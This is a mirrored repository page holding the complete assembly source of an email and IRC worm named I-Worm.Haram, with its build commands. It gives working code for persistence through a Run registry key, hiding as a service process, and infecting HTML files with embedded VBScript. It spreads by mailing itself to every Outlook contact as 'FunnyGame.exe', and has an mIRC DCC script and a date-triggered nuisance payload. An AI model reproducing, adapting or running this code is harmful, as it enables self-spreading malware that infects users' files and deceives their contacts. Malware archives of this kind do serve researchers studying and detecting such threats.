mirror of
https://github.com/vxunderground/MalwareSourceCode.git
synced 2025-01-01 16:05:27 +00:00
592 lines
12 KiB
NASM
592 lines
12 KiB
NASM
|
comment *
|
|||
|
Name : I-Worm.Haram
|
|||
|
Author : PetiK
|
|||
|
|
|||
|
Language : win32asm
|
|||
|
Date : May 13th 2002 - June 1st 2002
|
|||
|
|
|||
|
Size : 5192 bytes (compressed with Petite Tool)
|
|||
|
|
|||
|
Comments : - Copy to %sysdir%\FunnyGame.exe
|
|||
|
- Search all doc files in "Personal" folder and create a new virus html file:
|
|||
|
|
|||
|
example : document.doc -> document.htm
|
|||
|
1) 2)
|
|||
|
|
|||
|
1) Good DOC file
|
|||
|
2) Good HTM virus (1571 bytes)
|
|||
|
|
|||
|
- Put the name of all active process and add .htm:
|
|||
|
|
|||
|
example : process.exe -> process.exe.htm
|
|||
|
3) 4)
|
|||
|
|
|||
|
3) Real name of active process
|
|||
|
4) Real name of the HTM virus (in "C:\backup" folder for Win ME/2k/XP)
|
|||
|
|
|||
|
- Create a random name file in StarUp folder to spread with Outlook
|
|||
|
|
|||
|
- On the 10th, payload : open and close CD door and display a messagebox in loop
|
|||
|
|
|||
|
*
|
|||
|
|
|||
|
.586p
|
|||
|
.model flat
|
|||
|
.code
|
|||
|
|
|||
|
JUMPS
|
|||
|
|
|||
|
include win32api.inc
|
|||
|
|
|||
|
LF equ 10
|
|||
|
CR equ 13
|
|||
|
CRLF equ <13,10>
|
|||
|
|
|||
|
@pushsz macro msg2psh, empty
|
|||
|
local next_instr
|
|||
|
ifnb <empty>
|
|||
|
%out too much arguments in macro '@pushsz'
|
|||
|
.err
|
|||
|
endif
|
|||
|
call next_instr
|
|||
|
db msg2psh,0
|
|||
|
next_instr:
|
|||
|
endm
|
|||
|
|
|||
|
@endsz macro
|
|||
|
local nxtchr
|
|||
|
nxtchr: lodsb
|
|||
|
test al,al
|
|||
|
jnz nxtchr
|
|||
|
endm
|
|||
|
|
|||
|
api macro a
|
|||
|
extrn a:proc
|
|||
|
call a
|
|||
|
endm
|
|||
|
|
|||
|
WIN32_FIND_DATA struct
|
|||
|
dwFileAttributes dd 0
|
|||
|
ftCreationTime dd ?,?
|
|||
|
ftLastAccessTime dd ?,?
|
|||
|
ftLastWriteTime dd ?,?
|
|||
|
nFileSizeHigh dd 0
|
|||
|
nFileSizeLow dd 0
|
|||
|
dwReserved0 dd 0,0
|
|||
|
cFileName db 260 dup(0)
|
|||
|
cAlternateFileName db 14 dup(0)
|
|||
|
db 2 dup (0)
|
|||
|
WIN32_FIND_DATA ends
|
|||
|
|
|||
|
PROCESSENTRY32 STRUCT
|
|||
|
dwSize DWORD ?
|
|||
|
cntUsage DWORD ?
|
|||
|
th32ProcessID DWORD ?
|
|||
|
th32DefaultHeapID DWORD ?
|
|||
|
th32ModuleID DWORD ?
|
|||
|
cntThreads DWORD ?
|
|||
|
th32ParentProcessID DWORD ?
|
|||
|
pcPriClassBase DWORD ?
|
|||
|
dwFlags DWORD ?
|
|||
|
szExeFile db 260 dup(?)
|
|||
|
PROCESSENTRY32 ENDS
|
|||
|
|
|||
|
start: pushad
|
|||
|
@SEH_SetupFrame <jmp end_worm>
|
|||
|
|
|||
|
hide_the_worm:
|
|||
|
call hide_worm
|
|||
|
|
|||
|
get_name:
|
|||
|
push 50
|
|||
|
mov esi,offset orgwrm
|
|||
|
push esi
|
|||
|
push 0
|
|||
|
api GetModuleFileNameA
|
|||
|
|
|||
|
get_copy_name:
|
|||
|
mov edi,offset cpywrm
|
|||
|
push edi
|
|||
|
push 50
|
|||
|
push edi
|
|||
|
api GetSystemDirectoryA
|
|||
|
add edi,eax
|
|||
|
mov eax,'nuF\'
|
|||
|
stosd
|
|||
|
mov eax,'aGyn'
|
|||
|
stosd
|
|||
|
mov eax,'e.em'
|
|||
|
stosd
|
|||
|
mov eax,'ex'
|
|||
|
stosd
|
|||
|
pop edi
|
|||
|
|
|||
|
copy_worm:
|
|||
|
push 1
|
|||
|
push edi
|
|||
|
push esi
|
|||
|
api CopyFileA
|
|||
|
test eax,eax
|
|||
|
je ok_copy
|
|||
|
|
|||
|
push 50
|
|||
|
push edi
|
|||
|
push 1
|
|||
|
@pushsz "Haram"
|
|||
|
@pushsz "Software\Microsoft\Windows\CurrentVersion\Run"
|
|||
|
push 80000002h
|
|||
|
api SHSetValueA
|
|||
|
|
|||
|
push 50
|
|||
|
push offset msgwrm
|
|||
|
push esi
|
|||
|
api GetFileTitleA
|
|||
|
push 10h
|
|||
|
push offset msgwrm
|
|||
|
@pushsz "ERROR : this file is not a valid Win32 file."
|
|||
|
push 0
|
|||
|
api MessageBoxA
|
|||
|
ok_copy:
|
|||
|
|
|||
|
call inf_doc_personal
|
|||
|
|
|||
|
get_startup_path:
|
|||
|
push 0
|
|||
|
push 7
|
|||
|
push offset startup
|
|||
|
push 0
|
|||
|
api SHGetSpecialFolderPathA
|
|||
|
push offset startup
|
|||
|
api SetCurrentDirectoryA
|
|||
|
|
|||
|
call cr_vbsname
|
|||
|
|
|||
|
mov edi,offset vbsname
|
|||
|
|
|||
|
push 0
|
|||
|
push 1
|
|||
|
push 2
|
|||
|
push 0
|
|||
|
push 1
|
|||
|
push 40000000h
|
|||
|
push edi
|
|||
|
api CreateFileA
|
|||
|
mov ebp,eax
|
|||
|
push 0
|
|||
|
push offset byte_write
|
|||
|
push e_vbs - s_vbs
|
|||
|
push offset s_vbs
|
|||
|
push ebp
|
|||
|
api WriteFile
|
|||
|
push ebp
|
|||
|
api CloseHandle
|
|||
|
|
|||
|
|
|||
|
payload:
|
|||
|
mov eax,offset sysTime
|
|||
|
push eax
|
|||
|
api GetSystemTime
|
|||
|
lea eax,sysTime
|
|||
|
cmp word ptr [eax+6],10
|
|||
|
jne end_payload
|
|||
|
|
|||
|
xor eax,eax
|
|||
|
push eax
|
|||
|
push eax
|
|||
|
push eax
|
|||
|
@pushsz "set CDAudio door open"
|
|||
|
api mciSendStringA
|
|||
|
|
|||
|
push 500
|
|||
|
api Sleep
|
|||
|
|
|||
|
xor eax,eax
|
|||
|
push eax
|
|||
|
push eax
|
|||
|
push eax
|
|||
|
@pushsz "set CDAudio door closed"
|
|||
|
api mciSendStringA
|
|||
|
|
|||
|
push 40h
|
|||
|
@pushsz "I-Worm.Haram"
|
|||
|
@pushsz "Coded by PetiK - <20>2002 - France"
|
|||
|
push 0
|
|||
|
api MessageBoxA
|
|||
|
|
|||
|
api GetTickCount
|
|||
|
push 10000
|
|||
|
pop ecx
|
|||
|
xor edx,edx
|
|||
|
div ecx
|
|||
|
inc edx
|
|||
|
mov ecx,edx
|
|||
|
push ecx
|
|||
|
api Sleep
|
|||
|
jmp payload
|
|||
|
|
|||
|
end_payload:
|
|||
|
|
|||
|
call inf_process
|
|||
|
|
|||
|
end_worm:
|
|||
|
@SEH_RemoveFrame
|
|||
|
popad
|
|||
|
push 0
|
|||
|
api ExitProcess
|
|||
|
|
|||
|
hide_worm Proc
|
|||
|
pushad
|
|||
|
@pushsz "KERNEL32.DLL"
|
|||
|
api GetModuleHandleA
|
|||
|
xchg eax,ecx
|
|||
|
jecxz end_hide_worm
|
|||
|
@pushsz "RegisterServiceProcess" ; Registered as Service Process
|
|||
|
push ecx
|
|||
|
api GetProcAddress
|
|||
|
xchg eax,ecx
|
|||
|
jecxz end_hide_worm
|
|||
|
push 1
|
|||
|
push 0
|
|||
|
call ecx
|
|||
|
end_hide_worm:
|
|||
|
popad
|
|||
|
ret
|
|||
|
hide_worm EndP
|
|||
|
|
|||
|
Spread_Mirc Proc
|
|||
|
push offset cpywrm
|
|||
|
push offset mirc_exe
|
|||
|
api lstrcpy
|
|||
|
call @mirc
|
|||
|
db "C:\mirc\script.ini",0
|
|||
|
db "C:\mirc32\script.ini",0 ; spread with mIRC. Thanx to Microsoft.
|
|||
|
db "C:\progra~1\mirc\script.ini",0
|
|||
|
db "C:\progra~1\mirc32\script.ini",0
|
|||
|
@mirc:
|
|||
|
pop esi
|
|||
|
push 4
|
|||
|
pop ecx
|
|||
|
mirc_loop:
|
|||
|
push ecx
|
|||
|
push 0
|
|||
|
push 80h
|
|||
|
push 2
|
|||
|
push 0
|
|||
|
push 1
|
|||
|
push 40000000h
|
|||
|
push esi
|
|||
|
api CreateFileA
|
|||
|
mov ebp,eax
|
|||
|
push 0
|
|||
|
push offset byte_write
|
|||
|
@tmp_mirc:
|
|||
|
push e_mirc - s_mirc
|
|||
|
push offset s_mirc
|
|||
|
push ebp
|
|||
|
api WriteFile
|
|||
|
push ebp
|
|||
|
api CloseHandle
|
|||
|
@endsz
|
|||
|
pop ecx
|
|||
|
loop mirc_loop
|
|||
|
end_spread_mirc:
|
|||
|
ret
|
|||
|
Spread_Mirc EndP
|
|||
|
|
|||
|
|
|||
|
|
|||
|
inf_doc_personal Proc
|
|||
|
pushad
|
|||
|
get_personal_folder:
|
|||
|
push 0
|
|||
|
push 5
|
|||
|
push offset personal
|
|||
|
push 0
|
|||
|
api SHGetSpecialFolderPathA
|
|||
|
push offset personal
|
|||
|
api SetCurrentDirectoryA
|
|||
|
fff_doc:
|
|||
|
push offset ffile
|
|||
|
@pushsz "*.doc"
|
|||
|
api FindFirstFileA
|
|||
|
inc eax
|
|||
|
je end_f_doc
|
|||
|
dec eax
|
|||
|
mov [hfind],eax
|
|||
|
|
|||
|
cr_file:
|
|||
|
push offset ffile.cFileName
|
|||
|
push offset new_file
|
|||
|
api lstrcpy
|
|||
|
mov esi,offset new_file
|
|||
|
push esi
|
|||
|
api lstrlen
|
|||
|
add esi,eax
|
|||
|
sub esi,4 ; to become \SYSTEM\Wsock32
|
|||
|
mov [esi],"mth."
|
|||
|
lodsd
|
|||
|
|
|||
|
push 0
|
|||
|
push 1
|
|||
|
push 2
|
|||
|
push 0
|
|||
|
push 1
|
|||
|
push 40000000h
|
|||
|
push offset new_file
|
|||
|
api CreateFileA
|
|||
|
mov ebp,eax
|
|||
|
push 0
|
|||
|
push offset byte_write
|
|||
|
push e_htm - s_htm
|
|||
|
push offset s_htm
|
|||
|
push ebp
|
|||
|
api WriteFile
|
|||
|
push ebp
|
|||
|
api CloseHandle
|
|||
|
|
|||
|
fnf_doc:
|
|||
|
push offset ffile
|
|||
|
push [hfind]
|
|||
|
api FindNextFileA
|
|||
|
test eax,eax
|
|||
|
jne cr_file
|
|||
|
push [hfind]
|
|||
|
api FindClose
|
|||
|
end_f_doc:
|
|||
|
popad
|
|||
|
ret
|
|||
|
inf_doc_personal EndP
|
|||
|
|
|||
|
|
|||
|
inf_process Proc
|
|||
|
popad
|
|||
|
create_folder:
|
|||
|
push 0
|
|||
|
@pushsz "C:\backup"
|
|||
|
api CreateDirectoryA
|
|||
|
@pushsz "C:\backup"
|
|||
|
api SetCurrentDirectoryA
|
|||
|
enum_process:
|
|||
|
push 0
|
|||
|
push 2
|
|||
|
api CreateToolhelp32Snapshot
|
|||
|
mov lSnapshot,eax
|
|||
|
inc eax
|
|||
|
je end_inf_process
|
|||
|
lea eax,uProcess
|
|||
|
mov [eax.dwSize], SIZE PROCESSENTRY32
|
|||
|
lea eax,uProcess
|
|||
|
push eax
|
|||
|
push lSnapshot
|
|||
|
api Process32First
|
|||
|
check_process:
|
|||
|
test eax,eax
|
|||
|
jz end_process
|
|||
|
push ecx
|
|||
|
mov eax,ProcessID
|
|||
|
push offset uProcess
|
|||
|
cmp eax,[uProcess.th32ProcessID]
|
|||
|
je NextProcess
|
|||
|
lea ebx,[uProcess.szExeFile]
|
|||
|
|
|||
|
push ebx
|
|||
|
push offset new_name
|
|||
|
api lstrcpy
|
|||
|
mov edi,offset new_name
|
|||
|
push edi
|
|||
|
api lstrlen
|
|||
|
add edi,eax
|
|||
|
mov eax,"mth."
|
|||
|
stosd
|
|||
|
xor eax,eax
|
|||
|
stosd
|
|||
|
push offset new_name
|
|||
|
@pushsz "System.htm"
|
|||
|
api lstrcmp
|
|||
|
test eax,eax
|
|||
|
jz NextProcess
|
|||
|
|
|||
|
push 0
|
|||
|
push 1
|
|||
|
push 2
|
|||
|
push 0
|
|||
|
push 1
|
|||
|
push 40000000h
|
|||
|
push offset new_name
|
|||
|
api CreateFileA
|
|||
|
mov ebp,eax
|
|||
|
push 0
|
|||
|
push offset byte_write
|
|||
|
push e_htm - s_htm
|
|||
|
push offset s_htm
|
|||
|
push ebp
|
|||
|
api WriteFile
|
|||
|
push ebp
|
|||
|
api CloseHandle
|
|||
|
|
|||
|
NextProcess:
|
|||
|
push offset uProcess
|
|||
|
push lSnapshot
|
|||
|
api Process32Next
|
|||
|
jmp check_process
|
|||
|
end_process:
|
|||
|
push lSnapshot
|
|||
|
api CloseHandle
|
|||
|
end_inf_process:
|
|||
|
pushad
|
|||
|
ret
|
|||
|
inf_process EndP
|
|||
|
|
|||
|
|
|||
|
cr_vbsname Proc
|
|||
|
mov edi,offset vbsname
|
|||
|
; api GetTickCount
|
|||
|
push 10
|
|||
|
pop ecx
|
|||
|
; xor edx,edx
|
|||
|
; div ecx
|
|||
|
; inc edx
|
|||
|
; mov ecx,edx
|
|||
|
name_g:
|
|||
|
push ecx
|
|||
|
api GetTickCount
|
|||
|
push '9'-'0'
|
|||
|
pop ecx
|
|||
|
xor edx,edx
|
|||
|
div ecx
|
|||
|
xchg eax,edx
|
|||
|
add al,'0'
|
|||
|
stosb
|
|||
|
api GetTickCount
|
|||
|
push 100
|
|||
|
pop ecx
|
|||
|
xor edx,edx
|
|||
|
div ecx
|
|||
|
push edx
|
|||
|
api Sleep
|
|||
|
pop ecx
|
|||
|
loop name_g
|
|||
|
mov eax,"sbv."
|
|||
|
stosd
|
|||
|
ret
|
|||
|
cr_vbsname EndP
|
|||
|
|
|||
|
|
|||
|
|
|||
|
.data
|
|||
|
ffile WIN32_FIND_DATA <?>
|
|||
|
sysTime db 16 dup(0)
|
|||
|
|
|||
|
uProcess PROCESSENTRY32 <?>
|
|||
|
ProcessID dd ?
|
|||
|
lSnapshot dd ?
|
|||
|
new_name db 100 dup (?)
|
|||
|
|
|||
|
orgwrm db 50 dup (0)
|
|||
|
cpywrm db 50 dup (0)
|
|||
|
msgwrm db 50 dup (0)
|
|||
|
startup db 70 dup (0)
|
|||
|
personal db 70 dup (0)
|
|||
|
new_file db 90 dup (0)
|
|||
|
vbsname db 20 dup (0)
|
|||
|
byte_write dd ?
|
|||
|
hfind dd ?
|
|||
|
|
|||
|
s_mirc: db "[script]",CRLF
|
|||
|
db ";Don't edit this file.",CRLF,CRLF
|
|||
|
db "n0=on 1:JOIN:{",CRLF
|
|||
|
db "n1= /if ( $nick == $me ) { halt }",CRLF
|
|||
|
db "n2= /.dcc send $nick "
|
|||
|
mirc_exe db 50 dup (?)
|
|||
|
db CRLF,"n3=}",0
|
|||
|
e_mirc:
|
|||
|
|
|||
|
|
|||
|
s_htm: db '<haram>',CRLF
|
|||
|
db '<html><head><title>Windows Media Player</title></head><body>',CRLF
|
|||
|
db '<script language=VBScript>',CRLF
|
|||
|
db 'On Error Resume Next',CRLF
|
|||
|
db 'MsgBox "Please accept the ActiveX",vbinformation,"Internet Explorer"',CRLF
|
|||
|
db 'Set upfkupfk=CreateObject("Scripting.FileSystemObject")',CRLF
|
|||
|
db 'Set kupfkvqg=CreateObject("WScript.Shell")',CRLF
|
|||
|
db 'If err.number=429 Then',CRLF
|
|||
|
db 'kupfkvqg.Run javascript:location.reload()',CRLF
|
|||
|
db 'Else',CRLF,CRLF
|
|||
|
db 'glvqglvb(upfkupfk.GetSpecialFolder(0))',CRLF
|
|||
|
db 'glvqglvb(upfkupfk.GetSpecialFolder(1))',CRLF
|
|||
|
db 'glvqglvb(kupfkvqg.SpecialFolders("MyDocuments"))',CRLF
|
|||
|
db 'glvqglvb(kupfkvqg.SpecialFolders("Desktop"))',CRLF
|
|||
|
db 'glvqglvb(kupfkvqg.SpecialFolders("Favorites"))',CRLF
|
|||
|
db 'glvqglvb(kupfkvqg.SpecialFolders("Fonts"))',CRLF
|
|||
|
db 'End If',CRLF,CRLF
|
|||
|
db 'Function glvqglvb(dir)',CRLF
|
|||
|
db 'If upfkupfk.FolderExists(dir) Then',CRLF
|
|||
|
db ' Set bbbbbbbb=upfkupfk.GetFolder(dir)',CRLF
|
|||
|
db ' Set bbblvqgl=bbbbbbbb.Files',CRLF
|
|||
|
db ' For each lvqgvqgl in bbblvqgl',CRLF
|
|||
|
db ' lvqglvqr=lcase(upfkupfk.GetExtensionName(lvqgvqgl.Name))',CRLF
|
|||
|
db ' If lvqglvqr="htm" or lvqglvqr="html" Then',CRLF
|
|||
|
db ' Set rhmwrrhm=upfkupfk.OpenTextFile(lvqgvqgl.path,1 ,False)',CRLF
|
|||
|
db ' if rhmwrrhm.ReadLine <> "<haram>" Then',CRLF
|
|||
|
db ' rhmwrrhm.Close()',CRLF
|
|||
|
db ' Set rhmwrrhm=upfkupfk.OpenTextFile(lvqgvqgl.path,1 ,False)',CRLF
|
|||
|
db ' htmorg=rhmwrrhm.ReadAll()',CRLF
|
|||
|
db ' rhmwrrhm.Close()',CRLF
|
|||
|
db ' Set mwrrhmwr=document.body.createTextRange',CRLF
|
|||
|
db ' Set rhmwrrhm=upfkupfk.CreateTextFile(lvqgvqgl.path, True, False)',CRLF
|
|||
|
db ' rhmwrrhm.WriteLine "<haram>"',CRLF
|
|||
|
db ' rhmwrrhm.Write(htmorg)',CRLF
|
|||
|
db ' rhmwrrhm.WriteLine mwrrhmwr.htmltext',CRLF
|
|||
|
db ' rhmwrrhm.Close()',CRLF
|
|||
|
db ' Else',CRLF
|
|||
|
db ' rhmwrrhm.Close()',CRLF
|
|||
|
db ' End If',CRLF
|
|||
|
db ' End If',CRLF
|
|||
|
db ' Next',CRLF
|
|||
|
db 'End If',CRLF
|
|||
|
db 'End Function',CRLF
|
|||
|
db '</script></body></html>',0
|
|||
|
e_htm:
|
|||
|
|
|||
|
s_vbs: db 'On Error Resume Next',CRLF
|
|||
|
db 'Set terqne = CreateObject("Scripting.FileSystemObject")',CRLF
|
|||
|
db 'Set qumhzh = CreateObject("WScript.Shell")',CRLF
|
|||
|
db 'Set sys = terqne.GetSpecialFolder(1)',CRLF
|
|||
|
db 'copyname = sys&"\FunnyGame.exe"',CRLF
|
|||
|
db 'Set htgx = CreateObject("Outlook.Application")',CRLF
|
|||
|
db 'Set ofcc = htgx.GetNameSpace("MAPI")',CRLF
|
|||
|
db 'For each c In ofcc.AddressLists',CRLF
|
|||
|
db 'If c.AddressEntries.Count <> 0 Then',CRLF
|
|||
|
db 'For d = 1 To c.AddressEntries.Count',CRLF
|
|||
|
db 'Set etldb = htgx.CreateItem(0)',CRLF
|
|||
|
db 'etldb.To = c.AddressEntries(d).Address',CRLF
|
|||
|
db 'etldb.Subject = "New game from the net for you " & c.AddressEntries(d).Name',CRLF
|
|||
|
db 'etldb.Body = "Play at this funny game. It''s very cool !"',CRLF
|
|||
|
db 'etldb.Attachments.Add(copyname)',CRLF
|
|||
|
db 'etldb.DeleteAfterSubmit = True',CRLF
|
|||
|
db 'If etldb.To <> "" Then',CRLF
|
|||
|
db 'etldb.Send',CRLF
|
|||
|
db 'End If',CRLF
|
|||
|
db 'Next',CRLF
|
|||
|
db 'End If',CRLF
|
|||
|
db 'Next',0
|
|||
|
e_vbs:
|
|||
|
|
|||
|
ends
|
|||
|
end start
|
|||
|
|
|||
|
*************************************************************************
|
|||
|
|
|||
|
@tasm32 /M /ML haram.asm
|
|||
|
@tlink32 -Tpe -aa -c -x haram.obj,,,import32,haram.def
|
|||
|
rem pause
|
|||
|
rem upx -9 haram.exe
|
|||
|
@del *.obj
|
|||
|
rem pause
|
|||
|
|
|||
|
*************************************************************************
|
|||
|
|
|||
|
IMPORTS
|
|||
|
|
|||
|
SHLWAPI.SHSetValueA
|
|||
|
SHELL32.SHGetSpecialFolderPathA
|